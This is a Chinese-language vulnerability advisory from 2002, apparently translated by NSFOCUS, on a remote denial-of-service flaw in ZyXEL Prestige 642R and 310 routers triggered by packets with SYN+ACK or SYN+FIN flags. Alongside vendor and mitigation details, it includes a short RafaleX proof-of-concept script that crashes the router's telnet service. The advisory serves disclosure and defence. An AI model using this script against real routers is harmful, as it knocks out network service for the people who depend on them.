首页 -> 安全研究

安全研究

安全漏洞
Zyxel Prestige 642R畸形包远程拒绝服务攻击漏洞

发布日期:2002-06-17
更新日期:2002-06-28

受影响系统:

ZyXEL Prestige 642R
ZyXEL Prestige 310
不受影响系统:

ZyXEL Prestige 643
描述:

BUGTRAQ  ID: 5.34

ZyXEL 642R路由器是适合小型用户的路由器系列,使用ZyNOS操作系统。

ZyXEL 642R路由器在处理特殊TCP标志位的包存在漏洞,远程攻击者可以利用此漏洞进行拒绝服务攻击。

攻击者可以构建包含TCP标志ACK和SYN同时设置的包提交给路由器,可导致服务停止响应,即使通过RS-232服务也不能访问。

使用TCP标志SYN和FIN同时设置的包也可导致服务端口如telnet、FTP和DHCP停止响应几分钟。

ZyXEL 642R-11和Prestige 310路由器受此漏洞影响,ZxXEL 643 ADSL路由器不存在此漏洞。

<*来源:Kistler Ueli (iuk@gmx.ch
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-06/0170.html
        http://archives.neohapsis.com/archives/bugtraq/2002-06/0184.html
        http://archives.neohapsis.com/archives/bugtraq/2002-06/0186.html
        http://archives.neohapsis.com/archives/bugtraq/2002-06/0187.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Kistler Ueli (iuk@gmx.ch)提供了如下测试方法:

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag


// Variables
$done=Target attacked...


// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed
(V2.50(AJ.6))


!Sleep 1000


!Display=$done



建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在WAN设备中阻塞如下这些包:

- 所有从WAN到21、23和67端口的包。

*  在LAN设备中阻塞如下到21、23、67端口的包:

-  目标IP为路由器WAN IP的包
-  目标IP为路由器LAN地址的包
-  目标IP为广播地址。

尽可能关闭DHCP服务、TELNET和FTP服务可以通过设置设备为'security level 3'来关闭。

厂商补丁:

ZyXEL
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zywall.com/



浏览次数:3706
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障